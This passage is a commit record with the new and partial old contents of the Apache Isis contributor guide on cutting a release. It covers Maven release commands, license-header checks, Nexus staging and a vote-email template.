3.3.3\n","repos":"estatio\/isis,apache\/isis,oscarbou\/isis,oscarbou\/isis,estatio\/isis,apache\/isis,estatio\/isis,incodehq\/isis,incodehq\/isis,apache\/isis,apache\/isis,niv0\/isis,sanderginn\/isis,apache\/isis,incodehq\/isis,sanderginn\/isis,estatio\/isis,apache\/isis,oscarbou\/isis,niv0\/isis,sanderginn\/isis,oscarbou\/isis,niv0\/isis,niv0\/isis,incodehq\/isis,sanderginn\/isis","old_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/_cgcom_cutting-a-release.adoc","new_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/_cgcom_cutting-a-release.adoc","new_contents":"[[_cgcom_cutting-a-release]]\n= Cutting a Release\n:notice: licensed to the apache software foundation (asf) under one or more contributor license agreements. see the notice file distributed with this work for additional information regarding copyright ownership. the asf licenses this file to you under the apache license, version 2.0 (the \"license\"); you may not use this file except in compliance with the license. you may obtain a copy of the license at. http:\/\/www.apache.org\/licenses\/license-2.0 . unless required by applicable law or agreed to in writing, software distributed under the license is distributed on an \"as is\" basis, without warranties or conditions of any kind, either express or implied. see the license for the specific language governing permissions and limitations under the license.\n:_basedir: ..\/\n:_imagesdir: images\/\n:toc: right\n\n\nThe release process consists of:\n\n* the release manager cutting the release (documented below)\n* Members of the Apache Isis PMC xref:cgcom.adoc#_cgcom_verifying-releases[verifying] and voting on the release\n* the release manager performing post-release tasks, for either a xref:cgcom.adoc#_cgcom_post-release-successful[successful] or an xref:cgcom.adoc#_cgcom_post-release-unsuccessful[unsuccessful] vote.\n\nApache Isis itself consists of two separately releasable modules; relative to the link:https:\/\/git-wip-us.apache.org\/repos\/asf\/isis\/repo?p=isis.git;a=tree[source code root] there are:\n\n* `core`\n* `component\/example\/archetypes\/simpleapp`\n\nThis section details the process for formally releasing Isis modules. It describes the process for both `core` and then the archetype. The subsequent sections describe how other committers can xref:cgcom.adoc#_cgcom_verifying-releases[verify a release] and how the release manager can then perform xref:cgcom.adoc#_cgcom_post-release[post-release] activities and set up for the next development iteration.\n\nIf you've not performed a release before, then note that there are some configuration xref:cgcom.adoc#_cgcom_release-process-prereqs[prerequisites] that must be configured first. In particular, you'll need signed public\/private keys, and the ASF Nexus staging repo inlocal `~\/.m2\/settings.xml` file.\n\nThese release notes using bash command line tools. They should work on Linux and MacOS; for Windows, use mSysGit.\n\n\n\n\n[[_cgcom_cutting-a-release_obtain-consensus]]\n== Obtain Consensus\n\nBefore releasing `core`, ensure there is consensus on the link:..\/support.html[dev mailing list] that this is the right time for a release. The discussion should include confirming the version number to be used, and to confirm content.\n\nThese discussions should also confirm the version number of the module being released. This should be in line with our xref:cgcom.adoc#_cgcom_versioning-policy[semantic versioning policy].\n\n\nMake sure you have a JIRA ticket open against which to perform all commits. In most cases a JIRA ticket will have been created at the beginning of the previous release cycle.\n\n\n\n[[_cgcom_cutting-a-release_set-environment-variables]]\n== Set environment variables\n\nWe use environment variables to parameterize as many of the steps as possible. For example:\n\n[source,bash]\n----\ncd core\nexport ISISTMP=\/c\/tmp # <1>\nexport ISISDEV=1.15.0-SNAPSHOT\nexport ISISREL=1.14.0\nexport ISISRC=RC1\nexport ISISBRANCH=release-$ISISREL-$ISISRC\nexport ISISJIRA=ISIS-9999 # <2>\nexport CATALINA_HOME=\/c\/java\/apache-tomcat-8.0.30 # <3>\n\nenv | grep ISIS | sort\n----\n<1> adjust by platform\n<2> set to an \"umbrella\" ticket for all release activities. (One should exist already, xref:cgcom.adoc#_cgcom_post-release-successful_update-jira_create-new-jira[created at] the beginning of the development cycle now completing).\n<3> adjust as required (Tomcat is used to smoke test the simpleapp archetype)\n\nObviously, alter `$ISISDEV` and `$ISISREL` as required, and bump `$ISISRC` for re-releasing following an xref:cgcom.adoc#_cgcom_post-release-unsuccessful[unsuccessful] releases.\n\n[IMPORTANT]\n====\nNote that the branch name is *not* the same any of the eventual tag names (eg `isis-1.14.0` or `simpleapp-archetype-1.14.0`).\n\nIf they did have the same name, then what would happen is that the `maven-release-plugin` would checkout the (HEAD of the) branch and thus upload a SNAPSHOT to the snapshot repository. What it should of course do is checkout the tag and then upload that to the release staging repository.\n====\n\n\n\n[[_cgcom_cutting-a-release_pull-down-code-to-release]]\n== Pull down code to release\n\nSet the HEAD of your local git repo to the commit to be released. This will usually be the tip of the origin's `master` branch. Then, create a release branch for the version number being released; eg:\n\n[source,bash]\n----\ngit checkout master\ngit pull --ff-only\ngit checkout -b $ISISBRANCH\n----\n\nAll release preparation is done locally; if we are successful, this branch will be merged back into master.\n\n\nDouble check that the version number of the parent pom should reflect the branch name that you are now on (with a `-SNAPSHOT` suffix). his will normally have been done already during earlier development; but confirm that it has been updated. If it has not, make the change.\n\nDouble check that the version number of the core POM (`core\/pom.xml`) should reflect the branch name that you are now on. For example, if releasing version `1.14.0`, the POM should read:\n\n[source,xml]\n----\n<groupId>org.apache.isis.core<\/groupId>\n<artifactId>isis<\/artifactId>\n<version>1.14.0-SNAPSHOT<\/version>\n----\n\nAlso, check that there are no snapshot dependencies:\n\n[source,bash]\n----\ngrep SNAPSHOT `\/bin\/find . -name pom.xml | grep -v target | grep -v mothball | sort`\n----\n\nThe only mention of `SNAPSHOT` should be for the Isis modules about to be released.\n\n[TIP]\n====\nObviously, don't update Apache Isis' `SNAPSHOT` references; these get updated by the `mvn release:prepare` command we run later.\n====\n\n\n\n[[_cgcom_cutting-a-release_releasing-core]]\n== Releasing Core\n\nFirst, we release `core`. Switch to the appropriate directory:\n\n[source,bash]\n----\ncd core\n----\n\n[[_cgcom_cutting-a-release_releasing-core_set-environment-variables]]\n=== Set environment variables\n\nSet additional environment variables for the core \"artifact\":\n\n[source,bash]\n----\nexport ISISART=isis\nexport ISISCOR=\"Y\"\n\nenv | grep ISIS | sort\n----\n\n\n\n[[_cgcom_cutting-a-release_releasing-core_license-headers]]\n=== License headers\n\nThe Apache Release Audit Tool `RAT` (from the http:\/\/creadur.apache.org[Apache Creadur] project) checks for missing license header files. The parent `pom.xml` of each releasable module specifies the RAT Maven plugin, with a number of custom exclusions.\n\nTo run the RAT tool, use:\n\n[source,bash]\n----\nmvn org.apache.rat:apache-rat-plugin:check -D rat.numUnapprovedLicenses=50 -o && \\\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!???' $a; done || \\\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!AL' $a; done\n----\n\nwhere `rat.numUnapprovedLicenses` property is set to a high figure, temporarily overriding the default value of 0. This will allow the command to run over all submodules, rather than failing after the first one. The command writes out a `target\\rat.txt` for each submodule. missing license notes are indicated using the key `!???`. The `for` command collates all the errors.\n\nInvestigate and fix any reported violations, typically by either:\n\n* adding genuinely missing license headers from Java (or other) source files, or\n* updating the `<excludes>` element for the `apache-rat-plugin` plugin to ignore test files, log files and any other non-source code files\n* also look to remove any stale `<exclude>` entries\n\nTo add missing headers, use the groovy script `addmissinglicenses.groovy` (in the `scripts` directory) to automatically insert missing headers for certain file types. The actual files checked are those with extensions specified in the line `def fileEndings = [".java", ".htm"]`:\n\n[source,bash]\n----\ngroovy ..\/scripts\/addmissinglicenses.groovy -x\n----\n\n(If the `-x` is omitted then the script is run in \"dry run\" mode). Once you've fixed all issues, confirm once more that `apache-rat-plugin` no longer reports any license violations, this time leaving the `rat.numUnapprovedLicenses` property to its default, 0:\n\n[source,bash]\n----\nmvn org.apache.rat:apache-rat-plugin:check -D rat.numUnapprovedLicenses=0 -o && \\\nfor a in `find . -name rat.txt -print`; do grep '!???' $a; done\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_missing-license-check]]\n=== Missing License Check\n\nAlthough Apache Isis has no dependencies on artifacts with incompatible licenses, the POMs for some of these dependencies (in the Maven central repo) do not necessarily contain the required license information. Without appropriate additional configuration, this would result in the generated `DEPENDENCIES` file and generated Maven site indicating dependencies as having \"unknown\" licenses.\n\nFortunately, Maven allows the missing information to be provided by configuring the `maven-remote-resources-plugin`. This is stored in the `src\/main\/appended-resources\/supplemental-models.xml` file, relative to the root of each releasable module.\n\nTo capture the missing license information, use:\n\n[source,bash]\n----\nmvn license:download-licenses && \\\ngroovy ..\/scripts\/checkmissinglicenses.groovy\n----\n\nThe Maven plugin creates a `license.xml` file in the `target\/generated-resources` directory of each module. The script then searches for these `licenses.xml` files, and compares them against the contents of the `supplemental-models.xml` file.\n\nFor example, the output could be something like:\n\n[source,bash]\n----\nlicenses to add to supplemental-models.xml:\n\n[org.slf4j, slf4j-api, 1.5.7]\n[org.codehaus.groovy, groovy-all, 1.7.2]\n\nlicenses to remove from supplemental-models.xml (are spurious):\n\n[org.slf4j, slf4j-api, 1.5.2]\n----\n\nIf any missing entries are listed or are spurious, then update `supplemental-models.xml` and try again.\n\n\n\n\n[[_cgcom_cutting-a-release_releasing-core_commit-changes]]\n=== Commit changes\n\nCommit any changes from the preceding steps:\n\n[source,bash]\n----\ngit commit -am \"$ISISJIRA: updates to pom.xml etc for release\"\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_sanity-check]]\n=== Sanity check\n\nPerform one last sanity check on the codebase. Delete all Isis artifacts from your local Maven repo, then build using the `-o` offline flag:\n\n[source,bash]\n----\nrm -rf ~\/.m2\/repository\/org\/apache\/isis\nmvn clean install -o\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_release-prepare-dry-run]]\n=== Release prepare \"dry run\"\n\nMost of the work is done using the `mvn release:prepare` goal. Since this makes a lot of changes, we run it first in \"dry run\" mode; only if that works do we run the goal for real.\n\nRun the dry-run as follows:\n\n[source,bash]\n----\nmvn release:prepare -P apache-release -D dryRun=true \\\n -DreleaseVersion=$ISISREL \\\n -Dtag=$ISISART-$ISISREL \\\n -DdevelopmentVersion=$ISISDEV\n----\n\nYou may be prompted for the gpg passphrase.\n\n[NOTE]\n====\nExperiments in using `--batch-mode -Dgpg.passphrase="..."` to fully automate this didn't work; for more info, see http:\/\/maven.apache.org\/plugins\/maven-gpg-plugin\/sign-mojo.html[here] (maven release plugin docs) and http:\/\/maven.apache.org\/maven-release\/maven-release-plugin\/examples\/non-interactive-release.html[here] (maven gpg plugin docs).\n====\n\n\n\n[[_cgcom_cutting-a-release_releasing-core_release-prepare-proper]]\n=== Release prepare \"proper\"\n\nAssuming this completes successfully, re-run the command, but without the `dryRun` flag and specifying `resume=false` (to ignore the generated `release.properties` file that gets generated as a side-effect of using `git`). You can also set the `skipTests` flag since they would have been run during the previous dry run:\n\n[source,bash]\n----\nmvn release:prepare -P apache-release -D resume=false -DskipTests=true \\\n -DreleaseVersion=$ISISREL \\\n -Dtag=$ISISART-$ISISREL \\\n -DdevelopmentVersion=$ISISDEV\n----\n\n\n[TIP]\n====\nIf there are any snags at this stage, then explicitly delete the generated `release.properties` file first before trying again.\n====\n\n\n\n\n[[_cgcom_cutting-a-release_releasing-core_post-prepare-sanity-check]]\n=== Post-prepare sanity check\n\nYou should end up with artifacts in your local repo with the new version (eg `1.14.0`). This is a good time to do some quick sanity checks; nothing has yet been uploaded:\n\n* unzip the source-release ZIP and check it builds.\n* Inspect the `DEPENDENCIES` file, and check it looks correct.\n\nThese steps can be performed using the following script:\n\n[source]\n----\nrm -rf $ISISTMP\/$ISISART-$ISISREL\nmkdir $ISISTMP\/$ISISART-$ISISREL\n\nif [ \"$ISISCOR\" == \"Y\" ]; then\n ZIPDIR=\"$M2_REPO\/repository\/org\/apache\/isis\/core\/$ISISART\/$ISISREL\"\nelse\n ZIPDIR=\"$M2_REPO\/repository\/org\/apache\/isis\/$ISISCPT\/$ISISART\/$ISISREL\"\nfi\necho \"cp \\\"$ZIPDIR\/$ISISART-$ISISREL-source-release.zip\\\" $ISISTMP\/$ISISART-$ISISREL\/.\"\ncp \"$ZIPDIR\/$ISISART-$ISISREL-source-release.zip\" $ISISTMP\/$ISISART-$ISISREL\/.\n\npushd $ISISTMP\/$ISISART-$ISISREL\nunzip $ISISART-$ISISREL-source-release.zip\n\ncd $ISISART-$ISISREL\nmvn clean install\n\ncat DEPENDENCIES\n\npopd\n----\n\n\n[[_cgcom_cutting-a-release_releasing-core_release-perform-upload]]\n=== Release perform (Upload)\n\nOnce the release has been built locally, it should be uploaded for voting. This is done by deploying the Maven artifacts to a staging directory (this includes the source release ZIP file which will be voted upon).\n\nThe Apache staging repository runs on Nexus server, hosted at https:\/\/repository.apache.org[repository.apache.org]. The process of uploading will create a staging repository that is associated with the host (IP address) performing the release. Once the repository is staged, the newly created staging repository is \"closed\" in order to make it available to others.\n\nUse:\n\n[source,bash]\n----\nmvn release:perform -P apache-release \\\n -DworkingDirectory=$ISISTMP\/$ISISART-$ISISREL\/checkout\n----\n\nThe custom `workingDirectory` prevents file path issues if releasing on Windows. The command checks out the codebase from the tag, then builds the artifacts, then uploads them to the Apache staging repository:\n\n[source,bash]\n----\n...\n[INFO] --- maven-release-plugin:2.3.2:perform (default-cli) @ isis ---\n[INFO] Performing a LOCAL checkout from scm:git:file:\/\/\/C:\\APACHE\\isis-git-rw\\co\nre\n[INFO] Checking out the project to perform the release ...\n[INFO] Executing: cmd.exe \/X \/C \"git clone --branch release-1.14.0 file:\/\/\/C:\\APACHE\\isis-git-rw\\core C:\\APACHE\\isis-git-rw\\core\\target\\checkout\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\n[INFO] Performing a LOCAL checkout from scm:git:file:\/\/\/C:\\APACHE\\isis-git-rw\n[INFO] Checking out the project to perform the release ...\n[INFO] Executing: cmd.exe \/X \/C \"git clone --branch release-1.14.0 file:\/\/\/C:\\APACHE\\isis-git-rw C:\\APACHE\\isis-git-rw\\core\\target\\checkout\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\n[INFO] Executing: cmd.exe \/X \/C \"git ls-remote file:\/\/\/C:\\APACHE\\isis-git-rw\"\n[INFO] Working directory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\n[INFO] Executing: cmd.exe \/X \/C \"git fetch file:\/\/\/C:\\APACHE\\isis-git-rw\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\\checkout\n[INFO] Executing: cmd.exe \/X \/C \"git checkout release-1.14.0\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\\checkout\n[INFO] Executing: cmd.exe \/X \/C \"git ls-files\"\n[INFO] Working directory: C:\\APACHE\\isis-git-rw\\core\\target\\checkout\n[INFO] Invoking perform goals in directory C:\\APACHE\\isis-git-rw\\core\\target\\checkout\\core\n[INFO] Executing goals 'deploy'...\n...\n----\n\nYou may (again) be prompted for gpg passphrase. All being well this command will complete successfully. Given that it is uploading code artifacts, it could take a while to complete.\n\n\n\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype]]\n== Releasing the Archetype\n\nApache Isis archetypes are reverse engineered from example applications.\nOnce reverse engineered, the source is checked into git (replacing any earlier version of the archetype) and released.\n\n\n[NOTE]\n====\nIf releasing using Windows and Maven >= 3.3.3, then there is an issue that requires a small workaround.\n\nIn Maven 3.3.3 the `mvn.bat` file was removed, replaced instead with `mvn.cmd`.\nHowever, `maven-archetype-plugin:2.4` only uses `mvn.bat`; this causes the `archetype:create-from-project` goal to fail.\nThe fix is to simple: just copy `mvn.cmd` to `mvn.bat`.\n====\n\n\nSwitch to the directory containing the `simpleapp` example:\n\n[source,bash]\n----\ncd ..\/example\/application\/simpleapp\n----\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_setup-environment-variables]]\n=== Setup environment variables\n\nSet additional environment variables for the `simpleapp-archetype` artifact:\n\n[source,bash]\n----\nexport ISISART=simpleapp-archetype\nexport ISISPAR=$ISISREL # <1>\n\nexport ISISCPT=$(echo $ISISART | cut -d- -f2)\nexport ISISCPN=$(echo $ISISART | cut -d- -f1)\n\nenv | grep ISIS | sort\n----\n<1> `$ISISPAR` is the version of the Apache Isis core that will act as the archetype's parent. Usually this is the same as `$ISISREL`.\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_check-the-example-app]]\n=== Check the example app\n\nUpdate the parent `pom.xml` to reference the _released_ version of Apache Isis core, eg:\n\n[source,xml]\n----\n<properties>\n <isis.version>1.14.0<\/isis.version>\n ...\n<\/properties>\n----\n\n\n\nCheck for and fix any missing license header notices:\n\n[source,bash]\n----\nmvn org.apache.rat:apache-rat-plugin:check -D rat.numUnapprovedLicenses=50 -o && \\\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!???' $a; done || \\\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!AL' $a; done\n----\n\n\nFinally, double check that the app\n\n* builds:\n+\n[source,bash]\n----\nmvn clean install\n----\n\n* can be run from an IDE\n** mainClass=`org.apache.isis.WebServer`\n** args=`-m domainapp.app.DomainAppAppManifestWithFixtures`\n\n* can be run using the mvn jetty plugin:\n+\n[source,bash]\n----\npushd webapp\nmvn jetty:run\npopd\n----\n\n* can be deployed as a WAR\n+\n[source,bash]\n----\ncp webapp\/target\/simpleapp.war $CATALINA_HOME\/webapps\/ROOT.war\npushd $CATALINA_HOME\/bin\nsh startup.sh\ntail -f ..\/logs\/catalina.out\n----\n+\nquit using:\n+\n[source,bash]\n----\nsh shutdown.sh\npopd\n----\n\nIn each case, check the about page and confirm has been built against non-SNAPSHOT versions of the Apache Isis jars.\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_create-the-archetype]]\n=== Create the archetype\n\nMake sure you are in the correct directory and environment variables are correct.\n\nTo recreate the *simpleapp* archetype:\n\n[source,bash]\n----\ncd example\/application\/simpleapp\nenv | grep ISIS | sort\n----\n\nThen, run the script:\n\n[source,bash]\n----\nsh ..\/..\/..\/scripts\/recreate-archetype.sh $ISISJIRA\n----\n\nThe script automatically commits changes; if you wish use `git log` and\n`git diff` (or a tool such as SourceTree) to review changes made.\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_release-prepare]]\n=== Release prepare\n\nSwitch to the *archetype* directory and execute the `release:prepare`:\n\n[source]\n----\ncd ..\/..\/..\/example\/archetype\/$ISISCPN\nrm -rf $ISISTMP\/checkout\nmvn release:prepare -P apache-release \\\n -DreleaseVersion=$ISISREL \\\n -DdevelopmentVersion=$ISISDEV \\\n -Dtag=$ISISART-$ISISREL\n----\n\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_post-prepare-sanity-check]]\n=== Post-prepare sanity check\n\nThis is a good point to test the archetype; nothing has yet been uploaded.\n\n_In a different session_, create a new app from the archetype. First set up environment variables:\n\n[source,bash]\n----\nexport ISISTMP=\/c\/tmp # or as required\nexport ISISCPN=simpleapp\nenv | grep ISIS | sort\n----\n\nThen generate a new app from the archetype:\n\n[source,bash]\n----\nrm -rf $ISISTMP\/test-$ISISCPN\n\nmkdir $ISISTMP\/test-$ISISCPN\ncd $ISISTMP\/test-$ISISCPN\nmvn archetype:generate \\\n -D archetypeCatalog=local \\\n -D groupId=com.mycompany \\\n -D artifactId=myapp \\\n -D archetypeGroupId=org.apache.isis.archetype \\\n -D archetypeArtifactId=$ISISCPN-archetype\n----\n\nBuild the newly generated app and test:\n\n[source,bash]\n----\ncd myapp\nmvn clean install\ncd webapp\nmvn jetty:run # runs as mvn jetty plugin\n----\n\n\n\n[[_cgcom_cutting-a-release_releasing-the-archetype_release-perform-upload]]\n=== Release Perform (upload)\n\nBack in the original session (in the *archetype* directory, `example\/archetype\/$ISISCPN`), execute `release:perform`:\n\n[source]\n----\nmvn release:perform -P apache-release \\\n -DworkingDirectory=$ISISTMP\/checkout\n----\n\nThis will upload the artifacts to the ASF Nexus repository.\n\n\n[[_cgcom_cutting-a-release_check-close-staging-repo]]\n== Check\/Close Staging Repo\n\nThe `mvn release:perform` commands will have put release artifacts for both `core` and the `simpleapp` archetype into a newly created staging repository on the ASF Nexus repository server.\n\nLog onto http:\/\/repository.apache.org[repository.apache.org] (using your ASF LDAP account):\n\nimage::{_imagesdir}release-process\/nexus-staging-0.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-0.png\"]\n\nAnd then check that the release has been staged (select `staging repositories` from left-hand side):\n\nimage::{_imagesdir}release-process\/nexus-staging-1.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-1.png\"]\n\nIf nothing appears in a staging repo you should stop here and work out why.\n\nAssuming that the repo has been populated, make a note of its repo id; this is needed for the voting thread. In the screenshot above the id is `org.apache.isis-008`.\n\n\nAfter checking that the staging repository contains the artifacts that you expect you should close the staging repository. This will make it available so that people can check the release.\n\nPress the Close button and complete the dialog:\n\nimage::{_imagesdir}release-process\/nexus-staging-2.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-2.png\"]\n\nNexus should start the process of closing the repository.\n\nimage::{_imagesdir}release-process\/nexus-staging-2a.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-2a.png\"]\n\nAll being well, the close should (eventually) complete successfully (keep hitting refresh):\n\nimage::{_imagesdir}release-process\/nexus-staging-3.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-3.png\"]\n\nThe Nexus repository manager will also email you with confirmation of a successful close.\n\nIf Nexus has problems with the key signature, however, then the close will be aborted:\n\nimage::{_imagesdir}release-process\/nexus-staging-4.png[width=\"600px\",link=\"{_imagesdir}release-process\/nexus-staging-4.png\"]\n\nUse `gpg --keyserver hkp:\/\/pgp.mit.edu --recv-keys nnnnnnnn` to confirm that the key is available.\n\n\n[NOTE]\n====\nUnfortunately, Nexus does not seem to allow subkeys to be used for signing. See xref:cgcom.adoc#_cgcom_key-generation[Key Generation] for more details.\n====\n\n\n\n[[_cgcom_cutting-a-release_push-branches]]\n== Push branches\n\nPush the release branch to origin:\n\n[source,bash]\n----\ngit push -u origin $ISISBRANCH\n----\n\nand also push tags for both core and the archetype:\n\n[source]\n----\ngit push origin refs\/tags\/isis-$ISISREL:refs\/tags\/isis-$ISISREL-$ISISRC\ngit push origin refs\/tags\/simpleapp-archetype-$ISISREL:refs\/tags\/simpleapp-archetype-$ISISREL-$ISISRC\ngit fetch\n----\n\n[NOTE]\n====\nThe remote tag isn't visible locally but can be seen https:\/\/git-wip-us.apache.org\/repos\/asf\/isis\/repo?p=isis.git;a=summary[online].\n====\n\n\n\n[[_cgcom_cutting-a-release_voting]]\n== Voting\n\nOnce the artifacts have been uploaded, you can call a vote.\n\nIn all cases, votes last for 72 hours and require a +3 (binding) vote from members.\n\n[[_cgcom_cutting-a-release_voting-start-voting-thread]]\n=== Start voting thread on link:mailto:dev@isis.apache.org[dev@isis.apache.org]\n\nThe following boilerplate is for a release of the Apache Isis Core. Adapt as required:\n\nUse the following subject, eg:\n\n[source,bash]\n----\n[VOTE] Apache Isis Core release 1.14.0 RC1\n----\n\nAnd use the following body:\n\n[source,bash]\n----\nI've cut a release for Apache Isis Core and the simpleapp archetype:\n\n* Core 1.14.0\n* SimpleApp Archetype 1.14.0\n\nThe source code artifacts have been uploaded to staging repositories on repository.apache.org:\n\n* http:\/\/repository.apache.org\/content\/repositories\/orgapacheisis-10xx\/org\/apache\/isis\/core\/isis\/1.14.0\/isis-1.14.0-source-release.zip\n* http:\/\/repository.apache.org\/content\/repositories\/orgapacheisis-10xx\/org\/apache\/isis\/archetype\/simpleapp-archetype\/1.14.0\/simpleapp-archetype-1.14.0-source-release.zip\n\nFor each zip there is a corresponding signature file (append .asc to the zip's url).\n\nIn the source code repo the code has been tagged as isis-1.14.0-RC1 and simpleapp-archetype-1.14.0-RC1; see https:\/\/git-wip-us.apache.org\/repos\/asf?p=isis.git\n\nFor instructions on how to verify the release (build from binaries and\/or use in Maven directly), see http:\/\/isis.apache.org\/guides\/cgcom.html#_cgcom_verifying-releases\n\nPlease verify the release and cast your vote. The vote will be open for a minimum of 72 hours.\n\n[ ] +1\n[ ] 0\n[ ] -1\n----\n\nRemember to update:\n\n* the version number (1.14.0 or whatever)\n* the release candidate number (`RC1` or whatever)\n* the repository id, as provided by Nexus earlier (`orgapacheisis-10xx` or whatever)\n\nNote that the email also references the procedure for other committers to xref:cgcom.adoc#_cgcom_verifying-releases[verify the release].\n\n\n\n\n","old_contents":"[[_cgcom_cutting-a-release]]\n= Cutting a Release\n:notice: licensed to the apache software foundation (asf) under one or more contributor license agreements. see the notice file distributed with this work for additional information regarding copyright ownership. the asf licenses this file to you under the apache license, version 2.0 (the \"license\"); you may not use this file except in compliance with the license. you may obtain a copy of the license at. http:\/\/www.apache.org\/licenses\/license-2.0 . unless required by applicable law or agreed to in writing, software distributed under the license is distributed on an \"as is\" basis, without warranties or conditions of any kind, either express or implied. see the license for the specific language governing permissions and limitations under the license.\n:_basedir: ..\/\n:_imagesdir: images\/\n:toc: right\n\n\nThe release process consists of:\n\n* the release manager cutting the release (documented below)\n* Members of the Apache Isis PMC xref:cgcom.adoc#_cgcom_verifying-releases[verifying] and voting on the release\n* the release manager performing post-release tasks, for either a xref:cgcom.adoc#_cgcom_post-release-successful[successful] or an xref:cgcom.adoc#_cgcom_post-release-unsuccessful[unsuccessful] vote.\n\nApache Isis itself consists of two separately releasable modules; relative to the link:https:\/\/git-wip-us.apache.org\/repos\/asf\/isis\/repo?p=isis.git;a=tree[source code root] there are:\n\n* `core`\n* `component\/example\/archetypes\/simpleapp`\n\nThis section details the process for formally releasing Isis modules. It describes the process for both `core` and then the archetype. The subsequent sections describe how other committers can xref:cgcom.adoc#_cgcom_verifying-releases[verify a release] and how the release manager can then perform xref:cgcom.adoc#_cgcom_post-release[post-release] activities and set up for the next development iteration.\n\nIf you've not performed a release before, then note that there are some configuration xref:cgcom.adoc#_cgcom_release-process-prereqs[prerequisites] that must be configured first. In particular, you'll need signed public\/private keys, and the ASF Nexus staging repo inlocal `~\/.m2\/settings.xml` file.\n\nThese release notes using bash command line tools. They should work on Linux and MacOS; for Windows, use mSysGit.\n\n\n\n\n[[_cgcom_cutting-a-release_obtain-consensus]]\n== Obtain Consensus\n\nBefore releasing `core`, ensure there is consensus on the link:..\/support.html[dev mailing list] that this is the right time for a release. The discussion should include confirming the version number to be used, and to confirm content.\n\nThese discussions should also confirm the version number of the module being released. This should be in line with our xref:cgcom.adoc#_cgcom_versioning-policy[semantic versioning policy].\n\n\nMake sure you have a JIRA ticket open against which to perform all commits. In most cases a JIRA ticket will have been created at the beginning of the previous release cycle.\n\n\n\n[[_cgcom_cutting-a-release_set-environment-variables]]\n== Set environment variables\n\nWe use environment variables to parameterize as many of the steps as possible. For example:\n\n[source,bash]\n----\ncd core\nexport ISISTMP=\/c\/tmp # <1>\nexport ISISDEV=1.15.0-SNAPSHOT\nexport ISISREL=1.14.0\nexport ISISRC=RC1\nexport ISISBRANCH=release-$ISISREL-$ISISRC\nexport ISISJIRA=ISIS-9999 # <2>\nexport CATALINA_HOME=\/c\/java\/apache-tomcat-8.0.30 # <3>\n\nenv | grep ISIS | sort\n----\n<1> adjust by platform\n<2> set to an \"umbrella\" ticket for all release activities. (One should exist already, xref:cgcom.adoc#_cgcom_post-release-successful_update-jira_create-new-jira[created at] the beginning of the development cycle now completing).\n<3> adjust as required (Tomcat is used to smoke test the simpleapp archetype)\n\nObviously, alter `$ISISDEV` and `$ISISREL` as required, and bump `$ISISRC` for re-releasing following an xref:cgcom.adoc#_cgcom_post-release-unsuccessful[unsuccessful] releases.\n\n[IMPORTANT]\n====\nNote that the branch name is *not* the same any of the eventual tag names (eg `isis-1.14.0` or `simpleapp-archetype-1.14.0`).\n\nIf they did have the same name, then what would happen is that the `maven-release-plugin` would checkout the (HEAD of the) branch and thus upload a SNAPSHOT to the snapshot repository. What it should of course do is checkout the tag and then upload that to the release staging repository.\n====\n\n\n\n[[_cgcom_cutting-a-release_pull-down-code-to-release]]\n== Pull down code to release\n\nSet the HEAD of your local git repo to the commit to be released. This will usually be the tip of the origin's `master` branch. Then, create a release branch for the version number being released; eg:\n\n[source,bash]\n----\ngit checkout master\ngit pull --ff-only\ngit checkout -b $ISISBRANCH\n----\n\nAll release preparation is done locally; if we are successful, this branch will be merged back into master.\n\n\nDouble check that the version number of the parent pom should reflect the branch name that you are now on (with a `-SNAPSHOT` suffix). his will normally have been done already during earlier development; but confirm that it has been updated. If it has not, make the change.\n\nDouble check that the version number of the core POM (`core\/pom.xml`) should reflect the branch name that you are now on. For example, if releasing version `1.14.0`, the POM should read:\n\n[source,xml]\n----\n<groupId>org.apache.isis.core<\/groupId>\n<artifactId>isis<\/artifactId>\n<version>1.14.0-SNAPSHOT<\/version>\n----\n\nAlso, check that there are no snapshot dependencies:\n\n[source,bash]\n----\ngrep SNAPSHOT `\/bin\/find . -name pom.xml | grep -v target | grep -v mothball | sort`\n----\n\nThe only mention of `SNAPSHOT` should be for the Isis modules about to be released.\n\n[TIP]\n====\nObviously, don't update Apache Isis' `SNAPSHOT` references; these get updated by the `mvn release:prepare` command we run later.\n====\n\n\n\n[[_cgcom_cutting-a-release_releasing-core]]\n== Releasing Core\n\nFirst, we release `core`. Switch to the appropriate directory:\n\n[source,bash]\n----\ncd core\n----\n\n[[_cgcom_cutting-a-release_releasing-core_set-environment-variables]]\n=== Set environment variables\n\nSet additional environment variables for the core \"artifact\":\n\n[source,bash]\n----\nexport ISISART=isis\nexport ISISCOR=\"Y\"\n\nenv | grep ISIS | sort\n----\n\n\n\n[[_cgcom_cutting-a-release_releasing-core_license-headers]]\n=== License headers\n\nThe Apache Release Audit Tool `RAT` (from the http:\/\/creadur.apache.org[Apache Creadur] project) checks for missing license header files. The parent `pom.xml` of each releasable module specifies the RAT Maven plugin, with a number of custom exclusions.\n\nTo run the RAT tool, use:\n\n[source,bash]\n----\nmvn org.apache.rat:apache-rat-plugin:check -D rat.numUnapprovedLicenses=50 -o && \\\nfor a in `\/bin\/find . -name rat.txt -print`; do grep '!???' $a; done || \\\nfor a in `\/bin\/find . -name rat.txt -print`; do grep 